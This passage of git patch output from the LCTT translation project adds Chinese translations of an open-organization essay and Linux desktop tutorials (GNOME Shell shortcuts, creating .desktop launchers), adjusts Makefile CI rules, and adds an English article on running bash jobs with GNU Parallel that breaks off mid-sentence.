that [81% of respondents][2] agreed with the statement: "Having an open organizational culture is currently important to my company." - -But there was a catch. Just [67% of respondents][3] to that same survey agreed with the statement: "My organization has the resources necessary to build an open culture." - -These results echo what I'm hearing in my conversations with other companies: People want to work in an open culture, but they just don't know what to do or how to get there. I sympathize, because how an organization does what it does is something that's always difficult to capture, assess, and understand. In [Catalyst-In-Chief][4], I call it "the most mysterious and elusive to organizations." - -The Open Organization makes the compelling case that embracing a culture of openness is the surest path to creating sustained innovation during a time when digital transformation promises to change many of the traditional ways we've approached work. When we wrote it, we focused on describing the kind of culture that thrives inside Red Hat on our best days--not on writing a how-to book. We didn't lay out a step-by-step process for other organizations to follow. - -That's why it's been interesting to talk to other leaders and executives about how they've gone about starting this journey on their own. When creating an open organization, many senior leaders tend to attack the issue by saying they want to "change their culture." But culture isn't an input. It's an output--a byproduct of how people interact and behave on a daily basis. - -When creating an open organization, many senior leaders tend to attack the issue by saying they want to "change their culture." But culture isn't an input. - -Telling members of an organization to "work more transparently," "collaborate more," or "act more inclusively" won't produce results you're looking for. That's because cultural characteristics like "transparency," "collaboration," and "inclusivity" aren't behaviors. They're the values that guide behaviors inside the organization. - -So how do you go about building an open culture? - -Over the past two years, the community at Opensource.com has collected best practices for working, managing, and leading in the spirit of openness. Now we're sharing them in a new book, [The Open Organization Workbook][5], a more prescriptive guide to igniting culture change. - -Just remember that change of any kind, especially at scale, requires commitment, patience, and plenty of hard work. I encourage you to use this workbook as a way to achieve small, meaningful wins first, as you build toward larger victories and changes over time. - -By picking up a copy of this book, you've embarked on an exciting journey toward building the kind of open and innovative cultures your people will thrive in. We can't wait to hear your story. - -This article is part of the [Open Organization Workbook project][6]. - --------------------------------------------------------------------------------- - -via: https://opensource.com/open-organization/17/12/whitehurst-workbook-introduction - -作者:[Jim Whitehurst][a] -译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://opensource.com/users/jwhitehurst -[1]:https://www.redhat.com/en/blog/red-hat-releases-2017-open-source-culture-survey-results -[2]:https://www.techvalidate.com/tvid/923-06D-74C -[3]:https://www.techvalidate.com/tvid/D30-09E-B52 -[4]:https://opensource.com/open-organization/resources/catalyst-in-chief -[5]:https://opensource.com/open-organization/resources/workbook -[6]:https://opensource.com/open-organization/17/8/workbook-project-announcement diff --git a/translated/tech/20171214 A step-by-step guide to building open culture.md b/translated/tech/20171214 A step-by-step guide to building open culture.md new file mode 100644 index 0000000000..d6674c4286 --- /dev/null +++ b/translated/tech/20171214 A step-by-step guide to building open culture.md @@ -0,0 +1,43 @@ +手把手教你构建开放式文化 +====== +我们于 2015 年发表 `开放组织 (Open Organization)` 后,很对各种类型不同大小的公司都对“开放式”文化究竟意味着什么感到好奇。甚至当我跟别的公司谈论我们产品和服务的优势时,也总是很快就从谈论技术转移到人和文化上去了。几乎所有对推动创新和保持行业竞争优势有兴趣的人都在思考这个问题。 + +不是只有高级领导团队 (Senior leadership teams) 才对开放式工作感兴趣。[红帽公司最近一次调查 ][1] 发现 [81% 的受访者 ][2] 同意这样一种说法:"拥有开放式的组织文化对我们公司非常重要。" + +然而要注意的是。同时只有 [67% 的受访者 ][3] 认为:"我们的组织有足够的资源来构建开放式文化。" + +这个结果与我从其他公司那交流所听到的相吻合:人们希望在开放式文化中工作,他们只是不知道该怎么做。对此我表示同情,因为组织的行事风格是很难捕捉,评估,和理解的。在 [Catalyst-In-Chief][4] 中,我将其称之为 "组织中最神秘莫测的部分。" + +开放式组织之所以让人神往是因为在这个数字化转型有望改变传统工作方式的时代,拥抱开放文化是保持持续创新的最可靠的途径。当我们在书写本文的时候,我们所关注的是描述在红帽公司中兴起的那种文化--而不是编写一本如何操作的书。我们并不会制定出一步步的流程来让其他组织采用。 + +这也是为什么与其他领导者和高管谈论他们是如何开始构建开放式文化的会那么有趣。在创建开发组织时,很多高管会说我们要"改变我们的文化"。但是文化并不是一项输入。它是一项输出--它是人们互动和日常行为的副产品。 + +告诉组织成员"更加透明地工作","更多地合作",以及 "更加包容地行动" 并没有什么作用。因为像 "透明," "合作," and "包容" 这一类的文化特质并不是行动。他们只是组织内指导行为的价值观而已。 + +纳入要如何才能构建开放式文化呢? + +在过去的两年里,Opensource.com 设计收集了各种以开放的精神来进行工作,管理和领导的最佳实践方法。现在我们在新书 [The Open Organization Workbook][5] 中将之分享出来,这是一本更加规范的引发文化变革的指引。 + +要记住,任何改变,尤其是巨大的改变,都需要许诺 (commitment),耐心,以及努力的工作。我推荐你在通往伟大成功的大道上先使用这本工作手册来实现一些微小的,有意义的成果。 + +通过阅读这本书,你将能够构建一个开放而又富有创新的文化氛围,使你们的人能够茁壮成长。我已經迫不及待想听听你的故事了。 + +本文摘自 [Open Organization Workbook project][6]。 + +-------------------------------------------------------------------------------- + +via: https://opensource.com/open-organization/17/12/whitehurst-workbook-introduction + +作者:[Jim Whitehurst][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/jwhitehurst +[1]:https://www.redhat.com/en/blog/red-hat-releases-2017-open-source-culture-survey-results +[2]:https://www.techvalidate.com/tvid/923-06D-74C +[3]:https://www.techvalidate.com/tvid/D30-09E-B52 +[4]:https://opensource.com/open-organization/resources/catalyst-in-chief +[5]:https://opensource.com/open-organization/resources/workbook +[6]:https://opensource.com/open-organization/17/8/workbook-project-announcement From 749ceba6bdec0115a7ca77866f92c35d0dc8d037 Mon Sep 17 00:00:00 2001 From: wxy Date: Wed, 20 Dec 2017 21:49:55 +0800 Subject: [PATCH 0727/1627] =?UTF-8?q?=E4=BF=AE=E6=AD=A3=20CI=20=E8=A7=84?= =?UTF-8?q?=E5=88=99?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- Makefile | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/Makefile b/Makefile index f9afa44a97..0dd46292f7 100644 --- a/Makefile +++ b/Makefile @@ -18,28 +18,28 @@ $(CHANGE_FILE): git --no-pager diff $(TRAVIS_BRANCH) FETCH_HEAD --no-renames --name-status > $@ rule-source-added: - [ $(shell grep '^A\s\+sources/(news|talk|tech)/\d{8} [a-zA-Z0-9_.,\-\(\)\[\] ]*\.md' $(CHANGE_FILE) | wc -l) -ge 1 ] - [ $(shell grep -v '^A\s\+sources/(news|talk|tech)/\d{8} [a-zA-Z0-9_.,\-\(\)\[\] ]*\.md' $(CHANGE_FILE) | wc -l) = 0 ] + [ $(shell egrep '^A\s*sources/(news|talk|tech)/\d{8} [a-zA-Z0-9_.,\(\) \-]*\.md' $(CHANGE_FILE) | wc -l) -ge 1 ] + [ $(shell egrep -v '^A\s*sources/(news|talk|tech)/\d{8} [a-zA-Z0-9_.,\(\) \-]*\.md' $(CHANGE_FILE) | wc -l) = 0 ] echo 'Rule Matched: $(@)' rule-translation-requested: - [ $(shell grep '^M\s\+sources/(news|talk|tech)/\d{8} [a-zA-Z0-9_.,\-\(\)\[\] ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] + [ $(shell egrep '^M\s*sources/(news|talk|tech)/\d{8} [a-zA-Z0-9_.,\(\) \-]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] [ $(shell cat $(CHANGE_FILE) | wc -l) = 1 ] echo 'Rule Matched: $(@)' rule-translation-completed: - [ $(shell grep '^D\s\+sources/(news|talk|tech)/\d{8} [a-zA-Z0-9_.,\-\(\)\[\] ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] - [ $(shell grep '^A\s\+translated/(news|talk|tech)/\d{8} [a-zA-Z0-9_.,\-\(\)\[\] ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] + [ $(shell egrep '^D\s*sources/(news|talk|tech)/\d{8} [a-zA-Z0-9_.,\(\) \-]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] + [ $(shell egrep '^A\s*translated/(news|talk|tech)/\d{8} [a-zA-Z0-9_.,\(\) \-]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] [ $(shell cat $(CHANGE_FILE) | wc -l) = 2 ] echo 'Rule Matched: $(@)' rule-translation-revised: - [ $(shell grep '^M\s\+translated/(news|talk|tech)/\d{8} [a-zA-Z0-9_.,\-\(\)\[\] ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] + [ $(shell egrep '^M\s*translated/(news|talk|tech)/\d{8} [a-zA-Z0-9_.,\(\) \-]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] [ $(shell cat $(CHANGE_FILE) | wc -l) = 1 ] echo 'Rule Matched: $(@)' rule-translation-published: - [ $(shell grep '^D\s\+translated/(news|talk|tech)/\d{8} [a-zA-Z0-9_.,\-\(\)\[\] ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] - [ $(shell grep '^A\s\+published/\d{8} [a-zA-Z0-9_.,\-\(\)\[\] ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] + [ $(shell egrep '^D\s*translated/(news|talk|tech)/\d{8} [a-zA-Z0-9_.,\(\) \-]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] + [ $(shell egrep '^A\s*published/\d{8} [a-zA-Z0-9_.,\(\) \-]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] [ $(shell cat $(CHANGE_FILE) | wc -l) = 2 ] echo 'Rule Matched: $(@)' From c07b925b27ff7256392a8fdd15df5bf4853ba7b4 Mon Sep 17 00:00:00 2001 From: wxy Date: Wed, 20 Dec 2017 22:24:54 +0800 Subject: [PATCH 0728/1627] PRF:20171120 Useful GNOME Shell Keyboard Shortcuts You Might Not Know About.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @imquanquan 翻译时如果感觉原文不对劲,可以参照原文链接查看,如果有错误,直接更正即可。 --- ...oard Shortcuts You Might Not Know About.md | 50 +++++++++---------- 1 file changed, 24 insertions(+), 26 deletions(-) diff --git a/translated/tech/20171120 Useful GNOME Shell Keyboard Shortcuts You Might Not Know About.md b/translated/tech/20171120 Useful GNOME Shell Keyboard Shortcuts You Might Not Know About.md index c313a63897..2ca35529bd 100644 --- a/translated/tech/20171120 Useful GNOME Shell Keyboard Shortcuts You Might Not Know About.md +++ b/translated/tech/20171120 Useful GNOME Shell Keyboard Shortcuts You Might Not Know About.md @@ -1,34 +1,35 @@ -你可能不知道却实用的 GNOME Shell 快捷键 +你或许不知道的实用 GNOME Shell 快捷键 ======================================= + +![](https://www.maketecheasier.com/assets/uploads/2017/10/gnome-shortcuts-00-featured.jpg) + 由于 Ubuntu 在 17.10 发行版本中转移到了 GNOME Shell,许多用户可能对那些实用的快捷键以及创建自己的快捷键感兴趣。这篇文章就是介绍这两方面的。 -使你的生活更加便捷的现有 GNOME Shell 快捷键 -========================================== +### 已有的便捷的 GNOME Shell 快捷键 + 如果你希望 GNOME 有成百上千种快捷键,你会失望地发现,情况并非如此。快捷键的列表不会太长,而且并不是全部都对你有用,但仍然会有许多快捷键可以用得上的。 -![gnome-shortcuts-02-change-shortcut][3] - -![gnome-shortcuts-02-change-shortcut][3] +![gnome-shortcuts-01-settings][1] 可以通过菜单“设置 -> 设备 -> 键盘”访问快捷方式列表。以下是一些不太流行但实用的快捷方式。 - * `Ctrl` + `Alt` + `T` - 这是一个用来启动终端的快捷键组合,你可以在 GNOME 的任何地方使用它。 +* `Ctrl` + `Alt` + `T` - 这是一个用来启动终端的快捷键组合,你可以在 GNOME 的任何地方使用它。 我个人经常使用的两个快捷键是: - * `Alt` + `F4` - 关闭最顶层端口 - * `Alt` + `F8` - 调整窗口大小 +* `Alt` + `F4` - 关闭最顶层端口 +* `Alt` + `F8` - 调整窗口大小 大多数人都知道如何用 `Alt` + `Tab` 在打开的应用程序窗口之间,但是你可能不知道可以使用 `Alt` + `Shift` + `Tab` 在应用程序窗口之间进行反方向切换。 -在切换窗口界面时,另一个有用的组合键是 `Alt` + `Tab` 键上面的一个键。(例如:在 US 键盘布局中是: `Alt` + `` ` `` ) +在切换窗口界面时,另一个有用的组合键是 `Alt` + `~` (`tab` 键上面的一个键)。 -要是你想显示活动概览,你可以用快捷键 `Alt` + `F1` +要是你想显示活动概览,你可以用快捷键 `Alt` + `F1`。 有很多跟工作台有关的快捷键。如果你像我那样不经常使用多个工作台的话,这些快捷键对来说是没用的。尽管如此,以下几个快捷键还是值得留意的: - * `Super` + `PageUp` (或者 `PageDown` )移动到上方或下方的工作台 - * `Ctrl` + `Alt` + `Left` (或 `Right` )移动到左侧或右侧的工作台 +* `Super` + `PageUp` (或者 `PageDown` )移动到上方或下方的工作台 +* `Ctrl` + `Alt` + `Left` (或 `Right` )移动到左侧或右侧的工作台 如果在这些快捷键中加上 `Shift` ,例如 `Shift` + `Ctrl` + `Alt` + `Left`,则可以把当前窗口移动到其他工作区。 @@ -36,22 +37,19 @@ 上述是一些鲜为人知但是十分实用的键盘快捷键。如果你想知道更多实用的快捷键,可以查看[官方 GNOME Shell 快捷键列表][2]。 -如何创建自己的 GNOME Shell 快捷键 -================================= +### 如何创建自己的 GNOME Shell 快捷键 如果默认的快捷键不符合您的喜好,可以更改它们或创建新的快捷键。你同样可以通过菜单“设置 -> 设备 -> 键盘“完成这些操作。当你选择想更改的快捷键条目时,下面的对话框就会弹出。 +![gnome-shortcuts-02-change-shortcut][3] + 输入你想要的键盘快捷键组合。 ![gnome-shortcuts-03-set-shortcut][4] -![gnome-shortcuts-03-set-shortcut][4] - 如果这个快捷键已经被使用,你会得到一个消息。如果没有,只需点击设置,就完成了。 -如果要添加新快捷键而不是更改现有快捷键,请向下滚动,直到看到“+”标志,单击它,在出现的对话框中输入新键盘快捷键的名称和快捷键组合。 - -![gnome-shortcuts-04-add-custom-shortcut][5] +如果要添加新快捷键而不是更改现有快捷键,请向下滚动,直到看到 “+” 标志,单击它,在出现的对话框中输入新键盘快捷键的名称和快捷键组合。 ![gnome-shortcuts-04-add-custom-shortcut][5] @@ -63,13 +61,13 @@ via: https://www.maketecheasier.com/gnome-shell-keyboard-shortcuts/ 作者:[Ada Ivanova][a] 译者:[imquanquan](https://github.com/imquanquan) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 [a]:https://www.maketecheasier.com/author/adaivanoff/ -[1]https://www.maketecheasier.com/assets/uploads/2017/10/gnome-shortcuts-01-settings.jpg (gnome-shortcuts-01-settings) -[2]https://wiki.gnome.org/Projects/GnomeShell/CheatSheet -[3]https://www.maketecheasier.com/assets/uploads/2017/10/gnome-shortcuts-02-change-shortcut.png (gnome-shortcuts-02-change-shortcut) -[4]https://www.maketecheasier.com/assets/uploads/2017/10/gnome-shortcuts-03-set-shortcut.png (gnome-shortcuts-03-set-shortcut) -[5]https://www.maketecheasier.com/assets/uploads/2017/10/gnome-shortcuts-04-add-custom-shortcut.png (gnome-shortcuts-04-add-custom-shortcut) +[1]:https://www.maketecheasier.com/assets/uploads/2017/10/gnome-shortcuts-01-settings.jpg (gnome-shortcuts-01-settings) +[2]:https://wiki.gnome.org/Projects/GnomeShell/CheatSheet +[3]:https://www.maketecheasier.com/assets/uploads/2017/10/gnome-shortcuts-02-change-shortcut.png (gnome-shortcuts-02-change-shortcut) +[4]:https://www.maketecheasier.com/assets/uploads/2017/10/gnome-shortcuts-03-set-shortcut.png (gnome-shortcuts-03-set-shortcut) +[5]:https://www.maketecheasier.com/assets/uploads/2017/10/gnome-shortcuts-04-add-custom-shortcut.png (gnome-shortcuts-04-add-custom-shortcut) From 2e6a33d15abaa4445d22e6dffa01e3c27b46fc03 Mon Sep 17 00:00:00 2001 From: wxy Date: Wed, 20 Dec 2017 22:25:29 +0800 Subject: [PATCH 0729/1627] PUB:20171120 Useful GNOME Shell Keyboard Shortcuts You Might Not Know About.md @imquanquan https://linux.cn/article-9160-1.html --- ...ful GNOME Shell Keyboard Shortcuts You Might Not Know About.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {translated/tech => published}/20171120 Useful GNOME Shell Keyboard Shortcuts You Might Not Know About.md (100%) diff --git a/translated/tech/20171120 Useful GNOME Shell Keyboard Shortcuts You Might Not Know About.md b/published/20171120 Useful GNOME Shell Keyboard Shortcuts You Might Not Know About.md similarity index 100% rename from translated/tech/20171120 Useful GNOME Shell Keyboard Shortcuts You Might Not Know About.md rename to published/20171120 Useful GNOME Shell Keyboard Shortcuts You Might Not Know About.md From 9b8a92d2c11b8c9f4b53014afc3bc3dae934c47e Mon Sep 17 00:00:00 2001 From: darksun Date: Wed, 20 Dec 2017 22:44:49 +0800 Subject: [PATCH 0730/1627] =?UTF-8?q?translate=20done=20at=202017=E5=B9=B4?= =?UTF-8?q?=2012=E6=9C=88=2020=E6=97=A5=20=E6=98=9F=E6=9C=9F=E4=B8=89=2022?= =?UTF-8?q?:44:48=20CST?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ktop File For Your Application in Linux.md | 90 ------------------- ...ktop File For Your Application in Linux.md | 89 ++++++++++++++++++ 2 files changed, 89 insertions(+), 90 deletions(-) delete mode 100644 sources/tech/20171218 How to Create a .Desktop File For Your Application in Linux.md create mode 100644 translated/tech/20171218 How to Create a .Desktop File For Your Application in Linux.md diff --git a/sources/tech/20171218 How to Create a .Desktop File For Your Application in Linux.md b/sources/tech/20171218 How to Create a .Desktop File For Your Application in Linux.md deleted file mode 100644 index 79f6687b97..0000000000 --- a/sources/tech/20171218 How to Create a .Desktop File For Your Application in Linux.md +++ /dev/null @@ -1,90 +0,0 @@ -translating by lujun9972 -How to Create a .Desktop File For Your Application in Linux -====== -A .desktop file is simply a shortcut that is used to launch application in Linux. Without the .desktop file, your application won't show up in the Applications menu and you can't launch it with third-party launchers such as Synapse and Albert. - -Most applications, when installed, will create the .desktop file automatically and place themselves in the Application menu for quick access. However, if you compile a program from source or download an app in archive format, this may not be the case and you may have to open the terminal to execute the binary every time you want to use it. Obviously, this can become a very tedious and troublesome step. - -This article will describe how you can create a .desktop file for any application you use that you can launch from the Application menu. - - **Related** : [How to Add App Drawers to Unity Launcher in Ubuntu][1] - -### How to create Desktop launchers -A ".desktop" file is basically a simple text file that holds information about a program. It is usually placed in "~/.local/share/applications" or "/usr/share/applications/" depending whether you want the launcher to be accessible only for local account or for everyone. If you navigate to either directory in your File manager, you will see quite a few ".desktop" files that correspond to the installed apps on your computer. - -For demonstration purposes, I will create a .desktop file for Super Tux Kart, a kart racing game which I like to play sometimes. A version is available in the Ubuntu repos, but this is often behind the latest stable version. - -The only way to get the latest and greatest release is by downloading a tar archive, extracting it and executing a file which will launch the game. - -You can follow along with whatever program you want to create a launcher for and it should work the same way. - - **Note** : The following steps assume you have the archive for the program you want to create a launcher for in your "Downloads" folder. - -1\. Navigate to the directory where the archive is stored, right-click it and select "Extract here". - -![application-launcher-5][2] - -2\. Once the extraction is complete, Change to the newly created folder and find the executable. One you find it, right-click it click "Run" to launch the program, just to make sure it is working. - -![application-launcher-6][3] - -3\. In some cases, you won't see the "Run" option in the menu. This is often because the executable is a text file. You can get around this by executing it via the terminal or, if you use GNOME, click the Files menu in the top bar, and select "Preferences". - -![application-launcher-linux-1][4] - -4\. Select the "Behavior" tab and choose the "Run them" option under "Executable Text Files". Now the "Run" option should appear when you right-click the executable text file. - -![application-launcher-31][5] - -5\. If you've confirmed that the application works when you launch it, you can exit it. Then launch your text editor and paste the following into the empty text file: -``` -[Desktop Entry] -Encoding=UTF-8 -Version=1.0 -Type=Application -Terminal=false -Exec=/path/to/executable -Name=Name of Application -Icon=/path/to/icon -``` - -You need to change the "Exec" field to the path to the executable and "Name" field to the name of the application. Most programs would provide an icon somewhere in the archive so don't forget to include that as well. In my case, the launcher file for Super Tux Kart looks like this: - -![application-launcher-supertuxkart][6] - -6\. Save the file in "~/.local/share/applications" folder as "application-name.desktop". The ".local" folder is a hidden folder in your Home directory and you will have enable "Show Hidden Files" mode to view it. If you want it to be globally accessible, run the following command in the terminal: -``` -sudo mv ~/.local/share/applications/ /usr/share/applications/ -``` - -Of course, don't forget to change the to the actual name of the .desktop file. - -7\. Once done, just open the Applications menu on your desktop, and the application will be right there to use. - -![application-launcher-2][7] - -The method described here should work on all mainstream Linux based operating systems. Here's another screenshot showing Super Tux Kart in elementary OS's application launcher (slingshot) - -![application-launcher-4][8] - -Feel free to leave a comment below if you found this tutorial helpful. - --------------------------------------------------------------------------------- - -via: https://www.maketecheasier.com/create-desktop-file-linux/ - -作者:[Ayo Isaiah][a] -译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.maketecheasier.com/author/ayoisaiah/ -[1]:https://www.maketecheasier.com/add-app-drawer-unity-launcher-ubuntu/ (How to Add App Drawers to Unity Launcher in Ubuntu) -[2]:https://www.maketecheasier.com/assets/uploads/2017/11/application-launcher-5.png (application-launcher-5) -[3]:https://www.maketecheasier.com/assets/uploads/2017/11/application-launcher-6.png (application-launcher-6) -[4]:https://www.maketecheasier.com/assets/uploads/2017/11/application-launcher-linux-1.png (application-launcher-linux-1) -[5]:https://www.maketecheasier.com/assets/uploads/2017/11/application-launcher-31.png (application-launcher-31) -[6]:https://www.maketecheasier.com/assets/uploads/2017/11/application-launcher-supertuxkart.png (application-launcher-supertuxkart) -[7]:https://www.maketecheasier.com/assets/uploads/2017/11/application-launcher-2.jpg (application-launcher-2) -[8]:https://www.maketecheasier.com/assets/uploads/2017/11/application-launcher-4.jpg (application-launcher-4) diff --git a/translated/tech/20171218 How to Create a .Desktop File For Your Application in Linux.md b/translated/tech/20171218 How to Create a .Desktop File For Your Application in Linux.md new file mode 100644 index 0000000000..f6291f722c --- /dev/null +++ b/translated/tech/20171218 How to Create a .Desktop File For Your Application in Linux.md @@ -0,0 +1,89 @@ +为你的 Linux 应用创建 .Desktop 文件 +====== +在 Linux 中,一个 .desktop 文件就是一个用来运行程序的快捷方式。没有 .desktop 的话,你的应用就不会在应用菜单中显示了,也无法使用像 Synapse 和 Albert 这样的第三方启动起启动了。 + +大多数应用在安装后都会自动创建 .desktop 文件,并将自己放入应用菜单中以方便访问。然而,如果是你自己从源代码中编译的程序或者自己下载的压缩格式的应用,那就不会做这些事情了,每次你都需要打开终端来执行它的二进制文件。显然这个过程很无聊也很麻烦。 + +本文将会告诉你如何为应用创建 .desktop 文件,从而让你能在应用菜单中启动该应用。 + + **相关阅读**:[How to Add App Drawers to Unity Launcher in Ubuntu][1] + +### 如何创建桌面启动器 +".desktop" 文件基本上就是一个包含程序信息的纯文本文件,通常根据是自己可见还是所有用户可见的不同而放在 "~/.local/share/applications" 或者 "/usr/share/applications/" 目录中。你在文件管理器中访问这两个目录,都会看到很多系统中已安装应用对应的 ".desktop" 文件存在。 + +为了演示,我将会为 Super Tux Kart 创建一个 .desktop 文件,这是一个我很喜欢玩的卡丁车竞赛游戏。Ubuntu 仓库中带了这个游戏,但版本一般不新。 + +要获得最新的版本就需要下载 tar 包,解压并执行其中的游戏启动文件。 + +你可以仿照这个步骤来为任何程序创建启动器。 + + **注意**:下面步骤假设程序压缩包放在 "Downloads" 目录下。 + +1。跳转到存放压缩包的目录,右击然后选择 "Extract here"。 + +![application-launcher-5][2] + +2。解压后,进入新创建的目录然后找到可执行的文件。之后右击文件选择 "Run" 来启动程序,确定程序运行正常。 + +![application-launcher-6][3] + +3。有时候,你在右键菜单中找不到 "Run" 选项。这通常是因为这个可执行文件是一个文本文件。你可以在终端中执行它,如果你使用 GNOME 的话,可以点击上面菜单栏中的 Files 菜单,然后选择 "Preferences"。 + +![application-launcher-linux-1][4] + +4。选择 "Behavior" 标签页然后选择 "Executable Text Files" 下的 "Run them"。现在右击可执行文本文件后也能出现 "Run" 选项了。 + +![application-launcher-31][5] + +5。确认应用运行正常后,就可以退出它了。然后运行你的文本编辑器并将下面内容粘贴到空文本文件中: +``` +[Desktop Entry] +Encoding=UTF-8 +Version=1.0 +Type=Application +Terminal=false +Exec=/path/to/executable +Name=Name of Application +Icon=/path/to/icon +``` + +你需要更改 "Exec" 域的值为可执行文件的路径并且将 "Name" 域的值改成应用的名称。大多数的程序都在压缩包中提供了一个图标,不要忘记把它也填上哦。在我们这个例子中,Super Tux Kart 的启动文件看起来是这样的: + +![application-launcher-supertuxkart][6] + +6。将文件以 "application-name.desktop" 为名保存到 "~/.local/share/applications" 目录中。".local" 目录位于你的 Home 目录下,是一个隐藏目录,你需要启用 "Show Hidden Files" 模式才能看到它。如果你希望这个应用所有人都能访问,则在终端中运行下面命令: +``` +sudo mv ~/.local/share/applications/ /usr/share/applications/ +``` + +当然,别忘了把命令中的 改成真实的 .desktop 文件名。 + +7。完成后,打开应用菜单,就能看到应用出现在其中,可以使用了。 + +![application-launcher-2][7] + +这个方法应该适用于所有主流的 Linux 操作系统。下面是另一张 Super Tux Kart 在 elementary OS 的应用启动器 (slingshot) 上的截图 + +![application-launcher-4][8] + +如果你觉得本教程还有点用的话,欢迎留言。 + +-------------------------------------------------------------------------------- + +via: https://www.maketecheasier.com/create-desktop-file-linux/ + +作者:[Ayo Isaiah][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.maketecheasier.com/author/ayoisaiah/ +[1]:https://www.maketecheasier.com/add-app-drawer-unity-launcher-ubuntu/ (How to Add App Drawers to Unity Launcher in Ubuntu) +[2]:https://www.maketecheasier.com/assets/uploads/2017/11/application-launcher-5.png (application-launcher-5) +[3]:https://www.maketecheasier.com/assets/uploads/2017/11/application-launcher-6.png (application-launcher-6) +[4]:https://www.maketecheasier.com/assets/uploads/2017/11/application-launcher-linux-1.png (application-launcher-linux-1) +[5]:https://www.maketecheasier.com/assets/uploads/2017/11/application-launcher-31.png (application-launcher-31) +[6]:https://www.maketecheasier.com/assets/uploads/2017/11/application-launcher-supertuxkart.png (application-launcher-supertuxkart) +[7]:https://www.maketecheasier.com/assets/uploads/2017/11/application-launcher-2.jpg (application-launcher-2) +[8]:https://www.maketecheasier.com/assets/uploads/2017/11/application-launcher-4.jpg (application-launcher-4) From eb8b653c0fb5483b023a9287ec8e9cd4d37f4a2f Mon Sep 17 00:00:00 2001 From: darksun Date: Wed, 20 Dec 2017 22:50:35 +0800 Subject: [PATCH 0731/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20To=20Use?= =?UTF-8?q?=20Your=20Entire=20CPU=20In=20Bash=20With=20Parallel?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...e Your Entire CPU In Bash With Parallel.md | 104 ++++++++++++++++++ 1 file changed, 104 insertions(+) create mode 100644 sources/tech/20171219 How To Use Your Entire CPU In Bash With Parallel.md diff --git a/sources/tech/20171219 How To Use Your Entire CPU In Bash With Parallel.md b/sources/tech/20171219 How To Use Your Entire CPU In Bash With Parallel.md new file mode 100644 index 0000000000..ec45641ce9 --- /dev/null +++ b/sources/tech/20171219 How To Use Your Entire CPU In Bash With Parallel.md @@ -0,0 +1,104 @@ +translating by lujun9972 +How To Use Your Entire CPU In Bash With Parallel +====== +When a bash command is run it usually gets run in a single thread. This means that it will all the processing work will get executed on a single CPU. As CPU's have scaled out and increased their core count this means that only a small fraction of the available CPU resources will get used to work on your process. + +These unused CPU resources can make a big difference when the work we are trying to get done is bound by the speed that the CPU can crunch the data. This typically happens during media conversion e.g. picture and video, and data compression. + +In this guide, we will look at using the bash program [Parallel][1]. Parallel works by accepting a list as input and then executing a command in parallel across all your CPU cores on that list. Parallel will even send any output to stdout in sequence so it can be piped as stdin for a further command. + +### How To Use Parallel + +Parallel takes a list as input on stdin and then creates a number of processes with a supplied command, this takes the form: +``` +list | parallel command + +``` + +The list can be created by any of the usual bash commands e.g. `cat`, `grep`, `find`. The results of these commands are piped from their stdout to the stdin of parallel e.g.: +``` +find . -type f -name "*.log" | parallel + +``` + +Just like using `-exec` with `find`, `parallel` substitutes each member in the input list as `{}`. Here, `parallel` will gzip every file that `find` outputs: +``` +find . -type f -name "*.log" | parallel gzip {} + +``` + +The following examples of `parallel` in action will make this easier to understand. + +### Using Parallel For JPEG Optimization + +In this example, I took a collection of largish `.jpg`, ~10MB files and ran them through the [MozJPEG][2] JPEG image optimization tool produced by [Mozilla][3]. This tool reduces JPEG image file size while attempting to retain the image quality. This is important for websites in order to keep page load times down. + +Here is a typical `find` command to locate every `.jpg` file in the current directory and then run them through the image compression tool supplied in the MozJPEG package, `cjpeg`: +``` +find . -type f -name "*.jpg" -exec cjpeg -outfile LoRes/{} {} ';' + +``` + +This took `0m44.114s` seconds to run. Here is what `top` looked like while it was running: + +![][4] + +As you can see, only a single of the 8 available cores is working on the single thread. + +Here is the same command run with `parallel`: +``` +find . -type f -name "*.jpg" | parallel cjpeg -outfile LoRes/{} {} + +``` + +This reduces the time to optimize all the images to `0m10.814s`. The difference is clearly seen in this image of `top`: + +![][5] + +All the CPU cores are maxed out and there are 8 threads to match the 8 available CPU cores. + +### Using Parallel With GZIP + +If you need to compress a number of files rather than a single large one then `parallel` will speed things up. If you do need to compress a single file and want to utilize all your CPU cores take a look at the multi-threaded `gzip` replacement 